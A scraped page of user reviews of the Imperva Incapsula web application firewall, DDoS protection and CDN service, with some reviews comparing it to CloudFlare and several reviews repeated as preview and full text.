      We think that this product is fairly priced considering other products.

      Which other solutions did I evaluate?

      We evaluated Arbor Networks.

      What other advice do I have?

      Check the SLAs carefully.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      AVP Product Development and Architecture at a media company with 1,001-5,000 employees
      Vendor
      Provides WAF configuration. I would like them to improve the reporting interface and filtering.

      What is most valuable?

      WAF configuration is the most valuable feature.

      How has it helped my organization?

      Reduced spammers during competitions Bot reduction

      What needs improvement?

      Improve reporting interface and filtering.

      For how long have I used the solution?

      I have used it for two years.

      What was my experience with deployment of the solution?

      We have not encountered any deployment issues.

      What do I think about the stability of the solution?

      Mostly, we have not encountered any stability issues, except the occasional leak from the HK pod.

      What do I think about the scalability of the solution?

      We have not encountered any scalability issues.

      How are customer service and technical support?

      Customer Service: Customer service is good. Technical Support:…

      What is most valuable?

      WAF configuration is the most valuable feature.

      How has it helped my organization?

      • Reduced spammers during competitions
      • Bot reduction

      What needs improvement?

      Improve reporting interface and filtering.

      For how long have I used the solution?

      I have used it for two years.

      What was my experience with deployment of the solution?

      We have not encountered any deployment issues.

      What do I think about the stability of the solution?

      Mostly, we have not encountered any stability issues, except the occasional leak from the HK pod.

      What do I think about the scalability of the solution?

      We have not encountered any scalability issues.

      How are customer service and technical support?

      Customer Service:

      Customer service is good.

      Technical Support:

      Technical support is good.

      Which solution did I use previously and why did I switch?

      We previously used Fortinet.

      What was our ROI?

      Our ROI is about 45% since deployment on reduction of our cloud bill.

      What's my experience with pricing, setup cost, and licensing?

      Pricing and licensing is extremely competitive.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      Muhammad Nurazhan Moin
      Senior Web Manager at a university with 501-1,000 employees
      Real User
      CloudFlare vs. Incapsula

      What is most valuable?

      Incapsula:

      • Strength of DDoS and WAF
      • Simple dashboard
      • Analytics
      • SSL

      CloudFlare:

      • Ease of use
      • Simple dashboard
      • DNS management
      • CDN
      • SSL

      How has it helped my organization?

      Incapsula:

      It has provided heightened visibility and awareness at management level on the actual threat landscape; it paves the way for easier approval for security-related implementations/projects.

      CloudFlare:

      It provides free SSL certs that can be used on website domains that I did not purchase SSL certs for.

      Some protection and CDN caching realized, even though I’m on the free tier.

      What needs improvement?

      Incapsula:

      • Allow easier scripting of firewall rules.
      • Enable more custom actions to trigger turning on/off Incapsula settings (current actions are quite limited).
      • Allow setting up of user groups to manage different groups of sites with viewer/operations/admin levels of privileges. This is quite a typical requirement for enterprise clients who will have multiple teams taking care of different sites, plus an overall IT security team who oversees everything.

      CloudFlare:

      • Improve the strength of WAF/DDoS.
      • Reduce the rate of false positives.

      For how long have I used the solution?

      I have used Incapsula for about a year.

      I have used CloudFlare for almost a year.

      What do I think about the stability of the solution?

      Incapsula: The dashboard occasionally is not accessible (probably due to high load) but the sites protected seem intact.

      CloudFlare: I have not used it enough to provide useful information.

      What do I think about the scalability of the solution?

      Incapsula: The only issue so far is with the dashboard.

      CloudFlare: I have not used it enough to provide useful information.

      How are customer service and technical support?

      Incapsula: Technical support provides fast response via email tickets, and fairly responsive local technical/account reps.

      CloudFlare: I have hardly utilized their technical support so far.

      Which solution did I use previously and why did I switch?

      I did not previously use a different solution.

      How was the initial setup?

      For both Incapsula and CloudFlare, initial setup was very easy.

      What's my experience with pricing, setup cost, and licensing?

      Incapsula:

      Pricing is described on their website, but for enterprise agreements, clarify with local reps, as there might be a need for customized needs/pricing. Be clear on how they handle domains and subdomains.

      CloudFlare:

      Pricing and licensing is very clearly described on their website; 1 site = 1 domain. Clarify how to support subdomains.

      Which other solutions did I evaluate?

      We evaluated Incapsula and CloudFlare.

      What other advice do I have?

      Incapsula:

      You need to understand how DNS works (e.g., A records vs CNAME, TXTs etc.), how SSL works and how to set it up, and how web servers work with domains and proxy servers. It is not for the layman, as the dashboard assumes some level of understanding in these topics. Some settings can break your site, so do perform some tests on a development site before turning features on/off in the dashboard. The good thing is that most settings are reversible and take effect quite quickly, so if things do go wrong, it will not stay broken for too long.

      Also, use extra caution when dealing with TLDs, as the product does not handle your DNS, so for onboarding of domains using A records, you may need to ask Incapsula support for advice and assistance as it requires assigning the A record to a CNAME or IP address (network folks might understand the problem here).

      CloudFlare:

      You need to understand how DNS works (e.g., A records vs CNAME, TXTs etc.), how SSL works and how to set it up, and how web servers work with domains and proxy servers. It is not for the layman, as the dashboard assumes some level of understanding in these topics. Some settings can break your site, so do perform some tests on a development site before turning features on/off in the dashboard. The good thing is that most settings are reversible and take effect quite quickly, so if things do go wrong, it will not stay broken for too long.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      Client Relations Coordinator at a marketing services firm
      Vendor
      I like the interface, customer service, and info updates.

      What is most valuable?

      I like the interface, customer service, and info updates.

      How has it helped my organization?

      We can now quickly respond to issues, as opposed to trying to find the technical problem on our end. We can now quickly address the problems of our clients in an effective manner.

      What needs improvement?

      I have found some issues with caching; seems to be inconsistent

      For how long have I used the solution?

      I have used it for five months.

      What was my experience with deployment of the solution?

      We have not encountered any deployment issues.

      What do I think about the stability of the solution?

      We have encountered very few stability issues, but those could be more due to the stability of our servers.

      What do I think about the scalability of the solution?

      What is most valuable?

      I like the interface, customer service, and info updates.

      How has it helped my organization?

      We can now quickly respond to issues, as opposed to trying to find the technical problem on our end. We can now quickly address the problems of our clients in an effective manner.

      What needs improvement?

      I have found some issues with caching; seems to be inconsistent

      For how long have I used the solution?

      I have used it for five months.

      What was my experience with deployment of the solution?

      We have not encountered any deployment issues.

      What do I think about the stability of the solution?

      We have encountered very few stability issues, but those could be more due to the stability of our servers.

      What do I think about the scalability of the solution?

      We have not encountered any scalability issues.

      How are customer service and technical support?

      Customer Service:

      Customer service is 8/10.

      Technical Support:

      Technical support is 8/10.

      Which solution did I use previously and why did I switch?

      We did not previously use a different solution, but we researched other solutions. Incapsula was highly regarded and we were simply wowed.

      How was the initial setup?

      Initial setup was pretty straightforward on our end. Thanks for that!

      What about the implementation team?

      We did the implementation in house using our own personnel.

      What was our ROI?

      I'm not sure about ROI.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      Client Relations Coordinator at a marketing services firm
      Vendor
      Good customer support.

      What is most valuable?

      Customer Support has been the biggest help in dire situations. Their control panel is nice but support has been the best.

      How has it helped my organization?

      When under DDoS, we are able to get piece of mind to our clients since they know a large, technical company is dedicated to getting the issues resolved.

      What needs improvement?

      More products, especially for smaller companies that could benefit them.

      For how long have I used the solution?

      About 3 months.

      What was my experience with deployment of the solution?

      None.

      What do I think about the stability of the solution?

      None yet.

      What do I think about the scalability of the solution?

      Not that I know of.

      How are customer service and technical support?

      Customer Service:

      10/10

      Technical Support:

      8/10

      Which solution did I use previously and why did I switch?

      We had a sysadmin but he was unable to keep up. No other parties were used.

      How was the initial setup?

      Yes, it was straightforward for our IT team to implement.

      What about the implementation team?

      In house.

      What's my experience with pricing, setup cost, and licensing?

      We ate the cost so it wasn't passed on to the client.

      Which other solutions did I evaluate?

      From my understanding, our CEO had multiple parties on the table but decided Incapsula was the best fit for us.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user571794
      Network Security Consultant at a tech consulting company with 51-200 employees
      Consultant
      IncapRules, Login Protect & CDN are the most valuable features

      What is most valuable?

      IncapRules, Login Protect & CDN are the most valuable features of Incapsula.

      How has it helped my organization?

      Incapsula gave us an incredible visiblity in terms of security.

      What needs improvement?

      HTML minification could be improved. The actual HTML minification does not provide the maximum HTML minification nor provides the best result. 

      For how long have I used the solution?

      We are using this solution on our customer for three months.

      What was my experience with deployment of the solution?

      No issues, setup pretty easy and straightforward.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      No issues.

      How is customer service and technical support?

      The web support…

      What is most valuable?

      IncapRules, Login Protect & CDN are the most valuable features of Incapsula.

      How has it helped my organization?

      Incapsula gave us an incredible visiblity in terms of security.

      What needs improvement?

      HTML minification could be improved. The actual HTML minification does not provide the maximum HTML minification nor provides the best result. 

      For how long have I used the solution?

      We are using this solution on our customer for three months.

      What was my experience with deployment of the solution?

      No issues, setup pretty easy and straightforward.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      No issues.

      How is customer service and technical support?

      The web support could be enhanced, you need to call to get immediate support.

      How was the initial setup?

      Very easy setup!

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user570156
      Director at a tech company with 51-200 employees
      Vendor
      Considered CloudFlare as well. Didn't like that they want to take control of DNS.

      What is most valuable?

      CDN and DDoS.

      How has it helped my organization?

      This would speed up the images on the website geographically and protect against DDoS attacks.

      What needs improvement?

      Maybe another pricing tier for home uses with a few more features above the free version. An appliance for large enterprise customers.

      For how long have I used the solution?

      6 months.

      What was my experience with deployment of the solution?

      Very straightforward.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      None, all automatic.

      How are customer service and technical support?

      Customer Service: Excellent, no issues. Technical Support: Excellent.

      Which solution did I use previously and why did I

      What is most valuable?

      CDN and DDoS.

      How has it helped my organization?

      This would speed up the images on the website geographically and protect against DDoS attacks.

      What needs improvement?

      • Maybe another pricing tier for home uses with a few more features above the free version.
      • An appliance for large enterprise customers.

      For how long have I used the solution?

      6 months.

      What was my experience with deployment of the solution?

      Very straightforward.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      None, all automatic.

      How are customer service and technical support?

      Customer Service:

      Excellent, no issues.

      Technical Support:

      Excellent.

      Which solution did I use previously and why did I switch?

      No.

      How was the initial setup?

      Very straightforward, just some DNS changes.

      What about the implementation team?

      In-house, again very straightforward.

      What was our ROI?

      Priceless, DDoS protection.

      What's my experience with pricing, setup cost, and licensing?

      Choose the most appropriate model.

      Which other solutions did I evaluate?

      CloudFlare, didn't like as they want to take control of DNS.

      What other advice do I have?

      Great product, it will not let you down!

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user570582
      Information Security Consultant at a tech services company with 51-200 employees
      Consultant
      Load balancing and DDoS protection.

      What is most valuable?

      Load balancing and DDoS protection.

      What needs improvement?

      Delivery services and information security.

      For how long have I used the solution?

      One year.

      What was my experience with deployment of the solution?

      None, the deployment was very fast and easy.

      What do I think about the scalability of the solution?

      None.

      How are customer service and technical support?

      Customer Service: Excellent, they answered all our questions. Technical Support: Very good, the information provided by Imperva for the deployment was very clear.

      Which solution did I use previously and why did I switch?

      No.

      How was the initial setup?

      Straightforward.

      What about the implementation team?

      Imperva and in-house team, the support provided from the Imperva team was…

      What is most valuable?

      Load balancing and DDoS protection.

      What needs improvement?

      Delivery services and information security.

      For how long have I used the solution?

      One year.

      What was my experience with deployment of the solution?

      None, the deployment was very fast and easy.

      What do I think about the scalability of the solution?

      None.

      How are customer service and technical support?

      Customer Service:

      Excellent, they answered all our questions.

      Technical Support:

      Very good, the information provided by Imperva for the deployment was very clear.

      Which solution did I use previously and why did I switch?

      No.

      How was the initial setup?

      Straightforward.

      What about the implementation team?

      Imperva and in-house team, the support provided from the Imperva team was very reliable.

      What's my experience with pricing, setup cost, and licensing?

      Consider the unification of websites.

      Which other solutions did I evaluate?

      No.

      Disclosure: My company has a business relationship with this vendor other than being a customer: Partners
      ITCS user
      System Adminisrator at a tech services company with 51-200 employees
      Consultant
      We're using the security rules to block all secured areas by IP.

      What is most valuable?

      Security rules and DDoS protection.

      How has it helped my organization?

      Well, just by using the security rules to block all secured areas by IP minimized the chance of sensitive data leaking outside.

      What needs improvement?

      I'd like it to work with Let's Encrypt.

      For how long have I used the solution?

      1.5 years

      What was my experience with deployment of the solution?

      No issues.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      No issues.

      How are customer service and technical support?

      Customer Service: Once going enterprise, support is excellent. Technical Support: Once going enterprise, support is excellent.

      Which solution did I use previously and why did I switch?

      What is most valuable?

      Security rules and DDoS protection.

      How has it helped my organization?

      Well, just by using the security rules to block all secured areas by IP minimized the chance of sensitive data leaking outside.

      What needs improvement?

      I'd like it to work with Let's Encrypt.

      For how long have I used the solution?

      1.5 years

      What was my experience with deployment of the solution?

      No issues.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      No issues.

      How are customer service and technical support?

      Customer Service:

      Once going enterprise, support is excellent.

      Technical Support:

      Once going enterprise, support is excellent.

      Which solution did I use previously and why did I switch?

      CloudFlare and I switched because we needed more locations.

      How was the initial setup?

      Took us 10 minutes and we just waited for the DNS update.

      What about the implementation team?

      In house.

      What was our ROI?

      No ROI since we use it for protection. Its an additional expense with no ROI expectations.

      What's my experience with pricing, setup cost, and licensing?

      Always check the enterprise option, it gave us great rates.

      Which other solutions did I evaluate?

      We used CloudFlare in the past and we thought about working with Reblaze.

      What other advice do I have?

      Try it for 30 days, it will amaze you.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user508662
      IT & DevOps Engineer at a comms service provider with 501-1,000 employees
      Vendor
      It has SSL support and content caching. You can 'play' with the rules as much as you'd like.

      What is most valuable?

      We are using Incapsula as our web application firewall and for DDoS protection, and it performs really well at its job. Incapsula packs some great features, such as SSL support, content caching and the ability to 'play' with the rules as much as you'd like.

      How has it helped my organization?

      Since this is the very first WAF solution that we evaluated and tried to integrate into our AWS environment, I can't really say that it has improved anything, but the fact is, we never looked the other way.

      What needs improvement?

      Incapsula has a built-in monitoring module, but it is a paid feature; I would expect that for the price we pay for the basic service, we would be able to integrate a monitoring solution, even a simple one.

      In addition to that, Incapsula doesn't feature the option to add/remove available SSL protocols and/or ciphers.

      For how long have I used the solution?

      We have been using Incapsula for a little more than six months.

      What was my experience with deployment of the solution?

      The only problem we encountered with Incapsula regarding deployment is with their Performance solution that allows caching the hosted sites. The dynamic caching sometimes causes issues and we need to manually purge all of the cache from their system after a new version has been deployed, in order for new content to load properly.

      How are customer service and technical support?

      Technical support is excellent. In the few times we tried to contact Imperva's support, we received quick and swift replies.

      Which solution did I use previously and why did I switch?

      I did not previously use a different solution.

      How was the initial setup?

      The initial deployment is very straightforward; you follow a very simple setup wizard that guides you which changes you need to perform and where.

      What about the implementation team?

      We received the recommendation regarding Incapsula from Emind, a third-party vendor that helped us deploy our environment over at Amazon. The rest was performed by our in-house IT/Devops teams.

      What other advice do I have?

      I highly recommend Incapsula for anyone that is looking to integrate a WAF and DDoS protection into their environment.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user510588
      IT Director at a tech services company with 51-200 employees
      Consultant
      It can hide the true origin and provide access control. Their customer service sometimes has different responses for similar requests.

      What is most valuable?

      • Hidden origin
      • IP whitelist
      • Country blocking
      • Anti-DDoS
      • Special page protection (two-factor authentication)

      How has it helped my organization?

      For example, we host a website for customer in China. Incapsula can help to hide the real origin and provide access control over different pages. And it can protect the website from being attacked.

      Incapsula provides 7x24 service for protection, which saves us a lot of manpower.

      What needs improvement?

      • Customer service: Their customer service sometimes has different responses for similar requests. We sometimes need to explain the issue many times before they understand. Their CS staff is not well trained according to a consistent standard. For the same requests, some of them can perform well, but some of them might do it wrong.
      • Network management: Their network department sometimes doesn’t take the responsibility to improve network latency until we raise the problem many times or to top management. Sometimes, we encounter latency issues. Only sometimes does their network staff update their routing to improve the performance. Other times, they will not do so and they push the responsibility to another carrier.

      For how long have I used the solution?

      I have used it for one year.

      What do I think about the stability of the solution?

      Sometimes their system has routed our Asia traffic to US/EU and we needed to ask them to change the route back to Asia.

      What do I think about the scalability of the solution?

      Their Asia bandwidth, i.e. to China, sometimes has a lot of lag. And they take a long time to improve it, until they add a new ISP to improve the bandwidth.

      How are customer service and technical support?

      Technical support is 7/10.

      Which solution did I use previously and why did I switch?

      We previously used Akamai. Incapsula is much cheaper and the administration is much easier.

      How was the initial setup?

      Initial setup is easy, as Incapsula allows us to create new sites through their GUI or using an API.

      What's my experience with pricing, setup cost, and licensing?

      Incapsula pricing is very affordable.

      Which other solutions did I evaluate?

      Before choosing this product, I did not evaluate other options.

      What other advice do I have?

      If you don’t have a strong IT team for security, Incapsula is a good starting point for outsourcing your internet-facing security issues.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user507306
      Digital Solutions Architect | Development Manager | Technical Business Analyst at Corporate SEO
      Vendor
      Installation requires just a CNAME entry, avoiding the risk of email downtime.

      What is most valuable?

      • Faultless inlining & minification: Every competing product breaks the layout, but we are yet to see Incapsula break a site
      • Installation requires just a CNAME entry, avoiding the risk of email downtime.
      • Instant PCI compliance and protection from the OWASP Top 10 vulnerabilities.
      • CDN & DDoS protection.

      How has it helped my organization?

      Incapsula delivers a massive improvement to website performance and security in less than 20 minutes, regardless of the CMS. We love it so much that we decided to create a new service around this product, which could result in our largest income stream yet.

      What needs improvement?

      They once terminated a free account without warning, resulting in a few days downtime. But you get what you pay for.

      For how long have I used the solution?

      I have been using it for two years.

      What do I think about the stability of the solution?

      I have not encountered any stability issues.

      What do I think about the scalability of the solution?

      I have not encountered any scalability issues.

      How are customer service and technical support?

      Technical support is first class. These guys are sharp.

      Which solution did I use previously and why did I switch?

      We moved from CloudFlare because Incapsula’s minification was faultless, and their CNAME installation procedure avoided downtime for other services such as email.

      How was the initial setup?

      It was very easy to set up: 20 minutes and you're done.

      What's my experience with pricing, setup cost, and licensing?

      Go for the $59/month Pro plan. Free accounts can get terminated, and the higher plans are only if you like to have your own SSL certificate, or get regular DDoS attacks. The Pro plan has everything you need; it's just that you're using Imperva's SSL certificate, not yours.

      Which other solutions did I evaluate?

      Before choosing this product, we evaluate other options in great detail. We looked at CloudFlare, W3 Total Cache, WP Super Cache, Wordfence, BulletProof Security, Varnish, Mod_Security, ConfigServer, and a variety of other options. Incapsula isn't the cheapest, but is way in front of the competition. You'll easily spend double/triple the cost of your Incapsula subscription on maintaining any other solution, whereas Incapsula handles all that overhead for you, right out of the box.

      What other advice do I have?

      Don't wait till you've been hacked; get protected now. It'll cost you at least a year of Incapsula fees to recover from website hacking. And if your website is running slow, Google is probably already penalising your site, when the fix is so easy. Incapsula is by far the fastest fix for both website speed and security.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user504216
      Systems Administrator at a financial services firm with 501-1,000 employees
      Vendor
      Added security is the biggest bonus, as our websites have highly sensitive data.

      Valuable Features

      The added security is the biggest bonus feature, as our websites are not usually under extreme load but do have highly sensitive data. A good WAF can be difficult enough to configure even without many of the advanced security features that Imperva Incapsula includes: SQL injection prevention, bot attack recognition and notification, and DDoS.

      Improvements to My Organization

      Our audit experience is made much more simple due to having this solution. It is an answer to many security issues. We have all of the same sites available and audited internally. This extra layer of security helps with the external 'monitoring and alerting' and keeps that heavy administration portion to those who can handle it at scale a lot easier.

      Room for Improvement

      The API is lackluster but especially for 'customers'. The only thing we wanted to use the API for was only available to resellers.

      Use of Solution

      I have been using it for 5+ years.

      Stability Issues

      I have not encountered any stability issues at all.

      Scalability Issues

      We have a multitude of DNS names for essentially the same site. Despite that, we have to pay for each of these separately as different sites. This model is unfortunate for us but we find the service to be worth it. I could see this being a potential issue, while it is not yet.

      Customer Service and Technical Support

      I have had to contact support only once for API support and it was a good experience.

      Initial Setup

      Initial setup was simple but admittedly handled by a different person. I have set up and decommissioned sites with ease.

      Pricing, Setup Cost and Licensing

      You get a better bang for your buck with converged DNS site names. If you use separate DNS for smaller portions of a site, it will increase your licensing cost.

      Other Solutions Considered

      Before choosing this product, I did not evaluate other options.

      Other Advice

      Keep your sites strongly secured but sleep easier knowing Imperva Incapsula continuously baffles our penetration testers.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      Cyber Response Analyst at a insurance company with 1,001-5,000 employees
      Vendor
      Its DDoS Protection and Load Balancing helped maximize our security by adding an extra layer of protection.

      Valuable Features:

      • DDoS Protection
      • Load Balancing

      Improvements to My Organization:

      Incapsula’s DDoS Protection and Load Balancing really helped maximize our security. It added an extra layer of protection.

      Threat monitoring allows us to save time when responding to an incident. Previously we would have had to analyze logs, generate reports which takes time that could be spend remediating issues. Incapsula gives an uncomplicated overview of what is happening among other things.

      Incapsula's DDoS protection service delivers immediate and comprehensive protection for both network and application level (Layer 7). DDoS is a hugely beneficial feature.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      IT Support Engineer at a tech services company with 51-200 employees
      Consultant
      It helped us investigate and narrow down possible attacks from suspicious IPs.

      Valuable Features:

      • It provides real-time traffic analysis.
      • It gives location/hit/page view details.
      • It can easily and instantly block IPs.
      • We can investigate questionable and suspicious IPs.

      Improvements to My Organization:

      We're able to better manage network traffic with its analysis and security tools.

      It also helped us investigate and narrow down possible attacks from thousands of hits from suspicious IPs. In so doing, it also noted the presence of background scripts.

      It's helped us find vulnerabilities in our organization.

      Room for Improvement:

      • Its firewall should be made less penetrable so that if an IP is blocked once, it doesn't penetrate again.
      • The IP analytics should show trends and potential problem areas so that We can take action to minimize the occurrence of more hits from malicious IPs.
      • The process of reporting, analysis, and clearance could be improved.
      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user304074
      Sales office at a real estate/law firm with 51-200 employees
      Vendor
      It's improved the speed of our website and setup is straightforward, although the file-purging function could be improved.

      What is most valuable?

      • CDN
      • Site performance

      How has it helped my organization?

      The website itself is our first priority and we have seen improvements in that area -- it's faster.

      What needs improvement?

      Although we're only using it for the accelerator part, the purging of files and the way this feature functions could use improvement. It requires the user to either purge everything or go through specific files, but if you do, the latter doesn’t always work. So with the single files sometimes there is more difficulty.

      For how long have I used the solution?

      I've used it for a few months now.

      What was my experience with deployment of the solution?

      No issues. It was very straightforward.

      What do I think about the stability of the solution?

      No issues.

      What do I think about the scalability of the solution?

      It meets our needs right now. In the following months we are well within our package, but in the long term, we have to see if the cost will go up too much for our project’s needs. We are well covered for now.

      How are customer service and technical support?

      Customer Service:

      9.5 -- they're very good.

      Technical Support:

      9.5 -- turnaround is very fast.

      Which solution did I use previously and why did I switch?

      No, as we are a fairly new project so we have no other experience with another solution. However, we did look at CloudFlare, Limelight, and CDN networks.

      I had a gut feeling about the product right from the get-go.

      How was the initial setup?

      Very straightforward setup.

      What about the implementation team?

      It really depends what you're looking for. If you need to have a straightforward CDN, this CDN would probably be too expensive. If you want one solution with an all-in-one package for CDN and acceleration, I would definitely recommend Incapsula.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      ITCS user
      IT Manager at a tech services company with 1,001-5,000 employees
      Consultant
      We were able to dial in the security and protection that it provided and understand the threat to our company website.
      I was introduced to Incapsula after our company website had started to show signs of a persistent active DDoS attack. I got on the phone with their representative, who later brought in an engineer and within that same day we were able to begin mitigating the problem, all under the free trial. We were able to easily dial in the security and protection that the service provided and began to understand the threat (which was not a DDoS attack) quickly. We were so impressed with the effectiveness of the solution and the assistance that we received from support that we subscribed to their service in an ongoing basis, which has proven to be reliable and simple to use. However, I'd like to be able to drill down more into the analytics that Incapsula collects. For example, I'd like to be able…

      I was introduced to Incapsula after our company website had started to show signs of a persistent active DDoS attack.

      I got on the phone with their representative, who later brought in an engineer and within that same day we were able to begin mitigating the problem, all under the free trial. We were able to easily dial in the security and protection that the service provided and began to understand the threat (which was not a DDoS attack) quickly.

      We were so impressed with the effectiveness of the solution and the assistance that we received from support that we subscribed to their service in an ongoing basis, which has proven to be reliable and simple to use.

      However, I'd like to be able to drill down more into the analytics that Incapsula collects. For example, I'd like to be able to click on the pieces of the pie charts to get more detailed info. also, we had a small issue with some vagueness in the installation instructions, but we sorted it out and everything was good from that point on.

      They helped us to get the solution up and running, as well as assisted in setting up rules and other security settings that improved the overall effectiveness of the solution. I would recommend Incapsula's solution to anyone looking to add a robust security layer to their web sites and properties.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      Associate Manager at a tech services company with 10,001+ employees
      Real User
      The Web Application Firewall is helpful in protecting SQL injections.

      Valuable Features:

      The Web Application Firewall (WAF) is very helpful in protecting SQL injections by hackers.

      Improvements to My Organization:

      We implemented the WAF feature of Incapsula in our application which was exposed to the public.

      This implementation helped our organization a lot in handling web attacks by hackers and other malicious intruders.

      Room for Improvement:

      There is nothing as of now that I could suggest.

      Deployment Issues:

      We faced a bit of difficulty during setup, but the issue was resolved easily.

      Cost and Licensing Advice:

      I don't know because licensing is handled by PIR infrastructure and software team.

      We have just been provided a license to use the product.

      Other Advice:

      You can safely implement it irrespective of your application usage size.

      Disclosure: My company has a business relationship with this vendor other than being a customer: Partners
      it_user302106
      Application Development Manager at a financial services firm with 501-1,000 employees
      Vendor
      We're using it to replace Barracuda Web App Firewall which we retired several years ago.

      What is most valuable?

      I'd say that the most valuable feature is the ease of use in configuration, the analytics, and the integration with Incapsula’s robot database.

      How has it helped my organization?

      The product should be able to protect us from illegitimate web traffic, and reduce our data center costs through lowering the load on our systems.

      What needs improvement?

      The interface seems a bit outdated and simplistic.

      For how long have I used the solution?

      I have been familiar with it for a few months now.

      What was my experience with deployment of the solution?

      No issues with deployment.

      What do I think about the stability of the solution?

      No issues with stability.

      What do I think about the scalability of the solution?

      No issues with scalability thus far; we haven’t tried yet.

      How are customer service and technical support?

      Customer Service:

      Fairly low – I’m in between Incapsula sales people so it’s hard to answer, but I have had trouble getting answers to my questions.

      I like the product so I am happy with that but getting to them was not simple.

      Technical Support:

      They had one thing they had to do and they did that – was pretty straightforward.

      Which solution did I use previously and why did I switch?

      Yes, we were using Barracuda Web App Firewall which we retired several years ago.

      How was the initial setup?

      It was straightforward.

      What about the implementation team?

      I implemented on my own.

      What's my experience with pricing, setup cost, and licensing?

      Per month, the cost varies between $200 to $2,000, and there's no initial setup cost.

      What other advice do I have?

      I would say compare it to other solutions in the marketplace feature by feature and see how Incapsula reporting and analytics dashboards compare and bot control compares – their solution for bot control is pretty good – and check those features with other enterprise level solutions, you get a lot for your money.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      it_user300492
      Sales Engineer/Major Accounts with 51-200 employees
      Vendor
      With increasing traffic to our sites, it has protected them from DDoS attacks against which we did not previously have a solution.

      What is most valuable?

      • CDN
      • DDoS protection

      How has it helped my organization?

      Basically, before we found Incapsula, we were getting hit with 5-10 gigabit DDoS attacks, and we were trying to figure out how to fight the attacks. Therefore, we tried Incapsula out on one site, and through the trial we saw what the solution could do – the attacker gave up after a few tries. Once we signed up for an enterprise account with all ten sites we saw the attacks drop weekly.

      What needs improvement?

      It would be nice to get a feed from Incapsula to import into our system. We have to have multiple dashboards open at the same time, and it would be nice to have one single dashboard with all our information.

      For how long have I used the solution?

      I've used it for eight months.

      What was my experience with deployment of the solution?

      No issues encountered.

      What do I think about the stability of the solution?

      No issues – it has been particularly stable.

      What do I think about the scalability of the solution?

      Scalability has been pretty good, our European traffic has doubled and our sales have gone up along with our stability.

      How are customer service and technical support?

      Customer Service:

      10/10

      Technical Support:

      10/10 – within 5 minutes we have had a response.

      Which solution did I use previously and why did I switch?

      We used a NetScaler mitigation appliance – nothing worked that well, we were getting attacks and they were taking down services.

      How was the initial setup?

      Setup was fairly straightforward. It took about 10 minutes as I had to fine tune it with our API to mitigate what traffic was being blocked. I was able to determine that pretty quickly and adjust accordingly.

      What about the implementation team?

      We did it in-house.

      What was our ROI?

      Probably about $150,00-$190,000 savings. It's hard to predict, but that would be my ROI estimate.

      What's my experience with pricing, setup cost, and licensing?

      It costs around $7/month, really cheap.

      Which other solutions did I evaluate?

      We looked at CloudFlare. We tried it but it didn’t work that well.

      What other advice do I have?

      Make sure you use a premium DNS provider. We had to move from a basic DNS provider to a more complex one to get it work with Incapsula 100%.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      it_user298446
      VP R&D with 51-200 employees
      Vendor
      They don't require us to move our DNS service to them like other services do, allowing us to maintain our network in our current configuration.

      Valuable Features

      The features that are most valuable are the protection against denial-of-service attacks and all kinds of other internet attacks. The presence of Incapsula helps us answer the compliance requirements for IT security, as our clients require IT security compliance, and it's very important to our enterprise customers that we comply with the requirements.

      Improvements to My Organization

      Another important feature is that it doesn’t require us to move our DNS service to Incapsula like other services. It allows us to maintain our network in our current configuration. It works well with the Amazon cloud we use and doesn’t require us to re-configure our network.

      Room for Improvement

      Its user interface could be improved, as the competition looks better, but it doesn’t really need improvements in its functionality. We would like to have more reports and real-time views. Basically, the core functionality is great.

      Use of Solution

      We have been using the solution for six months.

      Deployment Issues

      No issues encountered.

      Stability Issues

      As far as I can see it's got great stability.

      Scalability Issues

      No issues with the scalability.

      Customer Service and Technical Support

      Customer Service:

      8/10 – they were responsive.

      Technical Support:

      8/10

      Initial Setup

      It doesn’t require any changes in code, so it's very easy to implement.

      Implementation Team

      We implemented it by ourselves, and it took an hour, and was very easy.

      ROI

      It's very difficult in security products to evaluate the ROI, but we definitely feel it has helped us with compliance – we get projects and customers we wouldn’t get if we didn’t have Incapsula. It's not something you can measure – we have no other option but to use the solution, it’s a necessity.

      Other Solutions Considered

      We tried the competition, Cloudflare, we even used them, but Incapsula is more suitable to use for web/mobile applications, and that is how we use it.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      ITCS user
      Senior Manager, Software Development at a music company with 1,001-5,000 employees
      Vendor
      We've found the caching, CDN, and Web Application Firewall features valuable, giving us an extra layer of PCI compliance.

      Valuable Features

      • Caching and CDN
      • WAF

      Improvements to My Organization

      We are using caching and CDN heavily, for certain campaigns we ended up in 80%+ of all the traffic served by Incapsula without passing to the origin servers.

      We were PCI-complaint before using Incapsula; however, it is always better to have one more layer of security.

      No DDOS attacks for now, but let's see once we face it.

      Room for Improvement

      Caching rules are really basic now and lots of space for improvement here.

